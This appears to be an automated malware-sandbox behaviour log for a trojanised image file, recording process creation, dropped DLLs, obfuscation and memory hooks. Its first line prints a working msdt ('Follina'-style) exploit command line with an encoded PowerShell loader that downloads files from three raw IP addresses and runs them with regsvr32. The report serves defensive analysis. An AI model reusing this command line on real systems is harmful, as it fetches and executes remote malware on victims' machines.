Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES473B.tmp" "c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5EDA.tmp" "c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4765.tmp" "c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP"
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220607 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c33guzif.vqh.ps1 Jump to behavior
Source: classification engine Classification label: mal84.troj.expl.evad.winIMG@27/33@0/1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BE400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 24_2_008BE400
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049BB96A CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification, 38_2_049BB96A
Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{EED88676-5DBA-42BA-A514-EEBD7864A628}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
Source: unknown Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: 68101181_048154.img Static file information: File size 2686976 > 1048576
Source: Binary string: amstream.pdb source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000018.00000003.796658393.0000000004C6F000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008CB02E push ebx; ret 24_2_008CB02F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008B01B0 pushad ; iretd 24_2_008B01B1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008CAD7C push cs; iretd 24_2_008CAE52
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008CAE7E push cs; iretd 24_2_008CAE52
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008CCB5D push esi; iretd 24_2_008CCB62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049CB02E push ebx; ret 38_2_049CB02F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049B01B0 pushad ; iretd 38_2_049B01B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049CAD7C push cs; iretd 38_2_049CAE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049CAE7E push cs; iretd 38_2_049CAE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 38_2_049CCB5D push esi; iretd 38_2_049CCB62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04ABB02E push ebx; ret 39_2_04ABB02F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04AA01B0 pushad ; iretd 39_2_04AA01B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04ABAD7C push cs; iretd 39_2_04ABAE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04ABAE7E push cs; iretd 39_2_04ABAE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 39_2_04ABCB5D push esi; iretd 39_2_04ABCB62
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482B02E push ebx; ret 40_2_0482B02F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_048101B0 pushad ; iretd 40_2_048101B1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482AD7C push cs; iretd 40_2_0482AE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482AE7E push cs; iretd 40_2_0482AE52
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 40_2_0482CB5D push esi; iretd 40_2_0482CB62
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\explorer.exe Code function: 24_2_008BEEBB LoadLibraryA,GetProcAddress, 24_2_008BEEBB
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.cmdline
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.cmdline
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\343kkfih\343kkfih.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mj2renji\mj2renji.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ej5ypzxn\ej5ypzxn.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\DiagPackage.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a\en-US\DiagPackage.dll.mui Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 6956 base: CDF380 value: E9 40 6E E4 FF
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 6936 base: CDF380 value: E9 40 6E 5B 02
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5012 base: CDF380 value: E9 40 6E A3 FF
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
